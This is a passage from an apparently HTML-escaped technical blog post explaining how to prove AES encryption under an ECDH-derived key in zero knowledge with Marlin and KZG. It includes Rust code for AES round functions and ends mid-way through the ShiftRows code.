&lt;p&gt;In symmetric encryption, Alice and Bob must agree on a shared key before sending messages. The problem is: how can they agree on a key if they can’t yet send messages to each other securely? Luckily, key agreement schemes, such as Diffie-Hellman, allow them to choose a secret key. We will focus here on the Elliptic Curve Diffie-Hellman protocol. The key ingredients are a finite field $\mathbb{F_p}$ (where $p$ is a large prime) and an elliptic curve $\mathcal{C}$ defined over $\mathbb{F_p}$ (which contains a subgroup of prime order $r$ with a generator $g$). It consists of the following steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Alice chooses an element $s_A$ in $\mathbb{F_p}$ and computes her public key, $g_A=s_A g$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Alice sends her public key $g_A$ to Bob.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Bob chooses an ephemeral key, $s_B$ in $\mathbb{F_p}$, and computes his public key $g_B=s_B g$ and the shared secret $g_{AB}=s_B g_A=s_As_B g$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Bob sends $g_B$ to Alice; Alice can also derive the shared secret by doing $g_{AB}=s_A g_B$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. They can calculate the symmetric key, $sk$, from the same key derivation function, $sk=KDF(g_{AB})$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
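The steps above can be sketched with a classic textbook curve. Everything here is illustrative only: the curve $y^2 = x^3 + 2x + 2$ over $\mathbb{F}_{17}$ with generator $(5,1)$ of order $19$ is a standard teaching example, nowhere near cryptographic size, and the helper names are assumptions:

```rust
// Toy elliptic-curve Diffie-Hellman on y^2 = x^3 + 2x + 2 mod 17.
// The generator (5, 1) has order 19. Nothing here is production code.
const P: i64 = 17;
const A: i64 = 2;

type Point = Option<(i64, i64)>; // None is the point at infinity

// Modular inverse via Fermat's little theorem (P is prime).
fn inv_mod(a: i64, m: i64) -> i64 {
    let (mut result, mut base, mut e) = (1, a.rem_euclid(m), m - 2);
    while e > 0 {
        if e & 1 == 1 { result = result * base % m; }
        base = base * base % m;
        e >>= 1;
    }
    result
}

fn add(p: Point, q: Point) -> Point {
    let (x1, y1) = match p { Some(v) => v, None => return q };
    let (x2, y2) = match q { Some(v) => v, None => return p };
    if x1 == x2 && (y1 + y2) % P == 0 { return None; } // P + (-P) = O
    let lambda = if x1 == x2 {
        (3 * x1 * x1 + A) * inv_mod(2 * y1, P) % P      // tangent slope
    } else {
        (y2 - y1).rem_euclid(P) * inv_mod(x2 - x1, P) % P // chord slope
    };
    let x3 = (lambda * lambda - x1 - x2).rem_euclid(P);
    let y3 = (lambda * (x1 - x3) - y1).rem_euclid(P);
    Some((x3, y3))
}

// Double-and-add scalar multiplication.
fn scalar_mul(mut k: u64, mut p: Point) -> Point {
    let mut acc: Point = None;
    while k > 0 {
        if k & 1 == 1 { acc = add(acc, p); }
        p = add(p, p);
        k >>= 1;
    }
    acc
}
```

With secret scalars $s_A$ and $s_B$, both parties compute $s_A s_B g$: Alice as `scalar_mul(s_a, g_b)`, Bob as `scalar_mul(s_b, g_a)`, and the results agree.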
&lt;p&gt;Given a message $m$, Bob can encrypt it and send it to Alice by using a scheme such as AES and the key,&lt;br &#x2F;&gt;
$$c=E(m,sk)$$&lt;br &#x2F;&gt;
Any encryption scheme must satisfy the following consistency check:&lt;br &#x2F;&gt;
$$ m=D(E(m,sk),sk)=D(c,sk)$$&lt;&#x2F;p&gt;
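As a toy illustration of this consistency check, the sketch below uses a simple repeating-key XOR cipher as a stand-in for a real scheme like AES; the function names are assumptions:

```rust
// Toy illustration of m = D(E(m, sk), sk), with XOR standing in
// for a real cipher. Not secure -- for demonstrating the check only.
fn encrypt(m: &[u8], sk: &[u8]) -> Vec<u8> {
    m.iter().zip(sk.iter().cycle()).map(|(a, b)| a ^ b).collect()
}

fn decrypt(c: &[u8], sk: &[u8]) -> Vec<u8> {
    // XOR is its own inverse, so decryption reuses the same operation.
    encrypt(c, sk)
}
```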
&lt;h3 id=&quot;goal&quot;&gt;Goal&lt;&#x2F;h3&gt;
&lt;p&gt;Alice needs Bob to send her some secret, $sc$, which she does not know directly (otherwise, she would not need to communicate with Bob). She only knows a commitment to $sc$ (for example, a Pedersen commitment). To send the secret, they need to agree on the key first. Then, Bob has to use that key to encrypt $sc$ and send it to Alice. The biggest problem is that Alice does not fully trust Bob. He could encrypt another message or use a different key. We want to develop a scheme where Bob can prove to Alice that he encrypted the message $sc$ using the key $sk$ without obviously leaking information about the key or the message.&lt;&#x2F;p&gt;
&lt;p&gt;Concisely, we can say that the goal is the following: Bob has to prove that the ciphertext $c$ is the result of the encryption of $m$ (whose commitment is $cm_m$) under a scheme (AES) using the symmetric key $sk$.&lt;&#x2F;p&gt;
&lt;p&gt;The following list shows all the input variables, indicating whether they are sensitive (should be secret) or not:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Secret: Bob&amp;#39;s ephemeral key, $s_B$, the message, $sc$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Public&#x2F;Not secret: ciphertext, $c$, Alice and Bob&amp;#39;s public keys, $g_A$ and $g_B$, the commitment to the message $cm_{sc}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;All other elements, such as the curve and finite field, have been previously agreed on and are publicly known.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;steps&quot;&gt;Steps&lt;&#x2F;h3&gt;
&lt;p&gt;The following calculations would allow Bob to achieve his goal:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Using his ephemeral key, show that $g_B==s_B g$. If he succeeds, he gets a boolean variable, $b_1=1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Using $s_B$ and $g_A$, he derives $sk$, encrypts $sc$ and shows that $c==E(sc,sk)$. If this passes, he gets $b_2=1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Using $sc$, he computes $\mathrm{commit}(sc)$ and checks whether $cm_{sc}=\mathrm{commit}(sc)$. If this is correct, he gets $b_3=1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. If $b_1 \wedge b_2 \wedge b_3=1$, all the checks passed and Bob has achieved his goal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The big question is how can he prove all these conditions without revealing sensitive information? Here is where zero-knowledge proofs come into play.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-are-zero-knowledge-proofs&quot;&gt;What are zero-knowledge proofs?&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge proofs (ZKP) are powerful cryptographic primitives which allow us to prove the validity of a statement or computation without revealing information other than the truth of the statement. We can represent any bounded computation as an arithmetic circuit, $C$. ZKP allow us to prove that, for publicly known values $x$, we know some secret $w$ such that $C(z=(x,w))=0$. In our case, the circuit is given by the computation performing checks 1-4. The variable $w$ contains $s_B$ and $sc$, $w=(s_B,sc)$. The public instance $x$ contains $g_A,g_B,c,cm_{sc}$ and the intended output, $1$, $x=(g_A,g_B,c,cm_{sc},1)$.&lt;&#x2F;p&gt;
&lt;p&gt;ZKP use polynomials and their properties to prove statements. Zk-SNARKs are ZKP with the following additional properties: succinctness (proofs are brief and faster to verify than naïve re-execution of the calculation) and non-interactive (prover and verifier do not need to exchange messages). There are two building blocks to most SNARKs: an information-theoretic device (most commonly, polynomial interactive oracle proofs, PIOP) and a cryptographic commitment scheme (in particular, polynomial commitment schemes, PCS). In this case, we will work with Marlin (PIOP) and the Kate-Zaverucha-Goldberg (KZG) commitment scheme.&lt;&#x2F;p&gt;
&lt;p&gt;The first step is to transform our code into arithmetic circuits or, equivalently, as a (quadratic) rank-one constraint system (R1CS). The latter is a system of equations of the form:&lt;br &#x2F;&gt;
$$ Az\cdot Bz=Cz$$&lt;br &#x2F;&gt;
where $A,B,C$ are matrices of the same size and $\cdot$ indicates the componentwise product.&lt;&#x2F;p&gt;
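Checking that a candidate assignment satisfies an R1CS can be sketched in a few lines. This is a minimal toy with assumed names and a small illustrative modulus, encoding the single constraint $x \cdot y = xy$ over $z=(1,x,y,xy)$:

```rust
// Minimal R1CS satisfiability check: verifies Az ∘ Bz = Cz entrywise,
// where ∘ is the componentwise (Hadamard) product, over a toy field.
const MODULUS: u64 = 97;

fn mat_vec(m: &[Vec<u64>], z: &[u64]) -> Vec<u64> {
    m.iter()
        .map(|row| row.iter().zip(z).map(|(a, b)| a * b % MODULUS).sum::<u64>() % MODULUS)
        .collect()
}

fn r1cs_satisfied(a: &[Vec<u64>], b: &[Vec<u64>], c: &[Vec<u64>], z: &[u64]) -> bool {
    let (az, bz, cz) = (mat_vec(a, z), mat_vec(b, z), mat_vec(c, z));
    az.iter().zip(&bz).zip(&cz).all(|((x, y), w)| x * y % MODULUS == *w)
}
```

Each row of $A$, $B$, $C$ encodes one multiplication gate; the prover's job is then to convince the verifier of this componentwise identity without revealing the witness part of $z$.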
&lt;p&gt;Then, we will express these constraints as polynomials and generate the proof. Polynomial commitments come into play to ensure the prover does not cheat and make the protocol zero-knowledge. We will now focus on the proof generation and verification of step 2 (AES encryption).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;encryption-using-the-advanced-encryption-standard-aes&quot;&gt;Encryption using the Advanced Encryption Standard (AES)&lt;&#x2F;h2&gt;
&lt;p&gt;AES is a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Block_cipher&quot;&gt;block cipher&lt;&#x2F;a&gt;: it takes a 128-bit message (interpreted as a $4\times 4$ matrix of bytes) and a secret key, $sk$, and performs a pseudorandom permutation. AES has a round function, which is applied a fixed number of times, each using a different key, to encrypt the message. We use the key scheduling function to derive all the round keys from the master key, $sk$. The round function consists of the following operations:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Add a round key.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Substitute bytes (S-boxes).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Shift rows.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Mix columns.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Each of these operations is necessary to guarantee that AES is secure. Repeating the operations in multiple rounds guarantees that elements are sufficiently shuffled and mixed, leading to semantic security (that is, we cannot learn anything about the plaintext just by looking at the ciphertext).&lt;&#x2F;p&gt;
&lt;p&gt;AES is described in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;nvlpubs.nist.gov&#x2F;nistpubs&#x2F;FIPS&#x2F;NIST.FIPS.197.pdf&quot;&gt;NIST standard&lt;&#x2F;a&gt;. AES needs to use a mode to deal with messages of size greater than 128 bits. Some standard modes are AES-CBC (cipher block chaining) and AES-GCM (Galois counter mode, which provides authenticated encryption).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;add-round-key&quot;&gt;Add round key&lt;&#x2F;h3&gt;
&lt;p&gt;This is the step that makes the encryption depend on the key. For each round, a round key is derived from the master key ($sk$). The function is straightforward: it consists of an XOR operation between the round key and the state (the message or its transformations). To make it consistent with the code,&lt;br &#x2F;&gt;
$$ \mathrm{ret}=\mathrm{input\_text}\oplus \mathrm{key} $$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn add_round_key(input_text: &amp;amp;[u8], key: &amp;amp;[u8; 16]) -&amp;gt; [u8; 16] {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ret = [0_u8; 16];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _ = zip(input_text, key)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|(cell_i, key_i)| cell_i ^ key_i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect_slice(&amp;amp;mut ret[..]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ret&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The XOR operation appears frequently in cryptography. Unless we know the key, we have a 50% chance of guessing the correct value of each bit, which is as good as flipping a fair coin.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;substitute-bytes-s-boxes&quot;&gt;Substitute bytes &#x2F; S-boxes&lt;&#x2F;h3&gt;
&lt;p&gt;The S-boxes add the non-linear component to the block cipher: each byte of the state matrix is mapped one-to-one onto another byte. We present the complete code for computing the S-box, but in practice this is done via a lookup table. The table will prove helpful in generating the proof, since a table lookup requires fewer constraints than the whole computation.&lt;&#x2F;p&gt;
&lt;p&gt;In AES, we interpret bytes as polynomials of degree at most $7$, with coefficients in $\{0,1\}$. For example, the byte $10010110$ is interpreted as the polynomial $x^7+x^4+x^2+x$, and $00100001$ is $x^5+1$. We can multiply polynomials, but if the degree of the product is larger than $7$, we have to take the remainder of the product modulo the irreducible polynomial $m(x)=x^8+x^4+x^3+x+1$.&lt;&#x2F;p&gt;
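This byte multiplication with reduction by $m(x)$ can be sketched compactly. The function name is an assumption; the constant `0x1B` is $m(x)$ with the $x^8$ term dropped, since $x^8 \equiv x^4+x^3+x+1 \pmod{m(x)}$:

```rust
// Carry-less multiplication of bytes viewed as polynomials over GF(2),
// reduced modulo the AES polynomial m(x) = x^8 + x^4 + x^3 + x + 1.
fn gf_mul(mut a: u8, mut b: u8) -> u8 {
    let mut acc = 0u8;
    for _ in 0..8 {
        if b & 1 == 1 {
            acc ^= a; // add (XOR) the current multiple of a
        }
        let carry = a & 0x80 != 0;
        a <<= 1; // multiply a by x
        if carry {
            a ^= 0x1B; // reduce: x^8 ≡ x^4 + x^3 + x + 1 (mod m(x))
        }
        b >>= 1;
    }
    acc
}
```

The worked example from the AES standard, $\{57\} \bullet \{83\} = \{c1\}$, can be used as a sanity check.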
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn rotate_left(byte: u8, n: u8) -&amp;gt; u8 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (byte &amp;lt;&amp;lt; n) | (byte &amp;gt;&amp;gt; (8 - n))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn substitute_byte(byte: u8) -&amp;gt; Result&amp;lt;u8&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if byte == 0x00 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return Ok(0x63);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut p = 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut q = 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut sbox = [0_u8; 256];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* loop invariant: p * q == 1 in the Galois field *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    loop {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* multiply p by 3 *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        p = p ^ (p &amp;lt;&amp;lt; 1_u8) ^ (((p &amp;gt;&amp;gt; 7_u8) &amp;amp; 1) * 0x1B);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* divide q by 3 (equals multiplication by 0xf6) *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        q ^= q &amp;lt;&amp;lt; 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        q ^= q &amp;lt;&amp;lt; 2_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        q ^= q &amp;lt;&amp;lt; 4_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        q ^= ((q &amp;gt;&amp;gt; 7_u8) &amp;amp; 1) * 0x09;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* compute the affine transformation *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let xformed =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            q ^ rotate_left(q, 1) ^ rotate_left(q, 2) ^ rotate_left(q, 3) ^ rotate_left(q, 4);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let p_as_usize: usize = p.try_into()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *sbox&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .get_mut(p_as_usize)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .to_anyhow(&amp;quot;Error saving substitution box value&amp;quot;)? = xformed ^ 0x63;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if p == 1 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            break;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let byte_index: usize = byte.try_into()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(*sbox&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .get(byte_index)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .to_anyhow(&amp;quot;Error getting substitution box value&amp;quot;)?)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the first step, each byte is mapped to its multiplicative inverse. If $p(x)$ is the polynomial associated with the byte, there exists another polynomial $q(x)$ such that $p(x)q(x)\equiv 1 \pmod{m(x)}$ (that is, $m(x)$ divides $p(x)q(x)-1$). The only edge case is the $0$ byte, which has no inverse and is by convention mapped onto itself in the inversion step; after the affine transformation it becomes $0x63$, which is why the function returns that value directly in the if at the beginning.&lt;&#x2F;p&gt;
&lt;p&gt;The following steps give the calculation of the inverse:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut p = 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut q = 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;p = p ^ (p &amp;lt;&amp;lt; 1_u8) ^ (((p &amp;gt;&amp;gt; 7_u8) &amp;amp; 1) * 0x1B);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;q ^= q &amp;lt;&amp;lt; 1_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;q ^= q &amp;lt;&amp;lt; 2_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;q ^= q &amp;lt;&amp;lt; 4_u8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;q ^= ((q &amp;gt;&amp;gt; 7_u8) &amp;amp; 1) * 0x09;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Next, we perform an affine transformation on the inverse, which combines the bits at different positions:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let xformed =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            q ^ rotate_left(q, 1) ^ rotate_left(q, 2) ^ rotate_left(q, 3) ^ rotate_left(q, 4);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This last operation consists of four left rotations and four XOR operations.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;shiftrows&quot;&gt;ShiftRows&lt;&#x2F;h3&gt;
&lt;p&gt;This function changes the order of the elements in each row by performing a cyclic shift. The second row shifts each element one place to the left, the third one two places, and the fourth three. This transformation is linear; the constraints associated with it will also be linear.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn shift_rows(bytes: &amp;amp;[u8; 16], cs: &amp;amp;ConstraintSystemRef&amp;lt;ConstraintF&amp;gt;) -&amp;gt; Result&amp;lt;[u8; 16]&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Add each number to the constraint system.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in bytes {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        UInt8::new_witness(ark_relations::ns!(cs, &amp;quot;shift_rows_witness&amp;quot;), || Ok(byte))?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Turn the bytes into the 4x4 AES state matrix.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; The matrix is represented by a 2D array,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; where each array is a row.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; That is, let&amp;#39;s suppose that the flattened_bytes variable&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; is formed by the bytes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; [b0, ..., b15]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Then the AES state matrix will look like this:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; b0, b4, b8, b12,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; b1, b5, b9, b13,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; b2, b6, b10, b14,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; b3, b7, b11, b15&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; And our array will look like this:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;[&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
